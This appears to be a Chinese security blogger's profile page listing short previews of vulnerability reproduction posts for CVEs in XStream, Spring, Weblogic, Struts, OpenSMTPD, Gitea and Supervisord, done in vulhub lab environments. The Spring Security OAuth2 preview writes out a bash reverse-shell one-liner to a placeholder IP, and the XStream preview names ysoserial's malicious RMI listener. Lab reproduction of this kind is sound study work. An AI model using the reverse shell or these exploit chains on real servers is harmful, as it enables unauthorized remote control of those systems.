logo
publist
写文章

简介

该用户还未填写简介

擅长的技术栈

可提供的服务

暂无可提供的服务

XStream 反序列化命令执行漏洞(CVE-2021-21351)

漏洞简介XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命

#安全
Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)

漏洞简介Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。漏洞复现参考文章中的payload,在注册的时候抓包,并修改成如下数据包,即可运行命

#安全#spring
OpenSMTPD 远程命令执行漏洞 (CVE-2020-7247)

漏洞详细OpenBSD是加拿大OpenBSD项目组的一套跨平台的、基于BSD的类UNIX操作系统。 OpenSMTPD 6.6版本(用于OpenBSD 6.6版本和其他产品)中的smtp_session.c文件的‘smtp_mailaddr’函数存在安全漏洞。远程攻击者可通过特制的SMTP session利用该漏洞以root权限执行任意命令。漏洞复现我使用的是vulhub的环境,环境内自带poc.

#安全
Gitea 1.4.0 目录穿越导致命令执行漏洞

漏洞背景Gitea是从gogs衍生出的一个开源项目,是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。漏洞复现环境启动后,访问http://you-ip:3000,安装完环境后创建一个新的账号,再创建一个新的仓库,全部默认即可。然后找到我们刚刚的项目,如vulhub/repo(用户名/

#安全
XStream 反序列化命令执行漏洞(CVE-2021-29505)

漏洞简介XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.16 及之前版本黑名单存在缺陷,攻击者可利用sun.rmi.registry.RegistryImpl_Stub构造RMI请求,进而执行任意命令。漏洞复现我们需要自己的服务器上使用ysoserial的JRMPListener启动一个恶意的RMI Registry:java -cp ysoserial-mas

#安全
Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)

漏洞简介CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。影响范围10.3.6.0.0版本, 12.1.3.0.0版本, 12.2.1.3.0版本, 12.2.1.4.0版本, 14.1.

#安全
Supervisord 远程命令执行漏洞(CVE-2017-11610)

漏洞简介Supervisor是一套进程控制系统,用于监视和控制类Unix系统上的进程。XML-RPC server是其中的一个XML-RPC服务器。 Supervisor中的XML-RPC服务器存在安全漏洞。远程攻击者可借助特制的XML-RPC请求利用该漏洞执行任意命令。影响范围3.0.1之前的版本3.1.4之前的3.1.x版本3.2.4之前的3.2.x版本3.3.3之前的3.3.x版本漏洞复现发

#安全
S2-061 远程命令执行漏洞(CVE-2020-17530)

漏洞简介影响版本:Struts 2.0.0-Struts 2.5.25详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-061/README.zh-cn.md漏洞复现访问http://target-ip:8080/index.action查看到首页,发送如下数据包,即可执行id命令:POST /index.action HTT

Spring Messaging 远程命令执行漏洞(CVE-2018-1270)

漏洞简介Pivotal Spring Framework是美国Pivotal Software公司的一套开源的Java、Java EE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Pivotal Spring Framework 5.0.5之前的5.0版本、4.3.15之前的4.3版本和不再支持的老版本中存在安全漏洞。远程攻击者可通过构造消息利用该漏洞执行任意代码。漏洞复现我使用的是vul

#安全
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)

漏洞简介Pivotal Spring Security OAuth 2.0.0版本至2.0.9版本和1.0.0版本至1.0.5版本中存在安全漏洞。远程攻击者可通过为‘response_type’参数制作值利用该漏洞执行代码。漏洞复现我们来进行反弹shell的操作,首先将bash命令进行编码:bash -i >& /dev/tcp/your-ip/9999 0>&1我这里

#安全
    共 28 条
  • 1
  • 2
  • 3
  • 请选择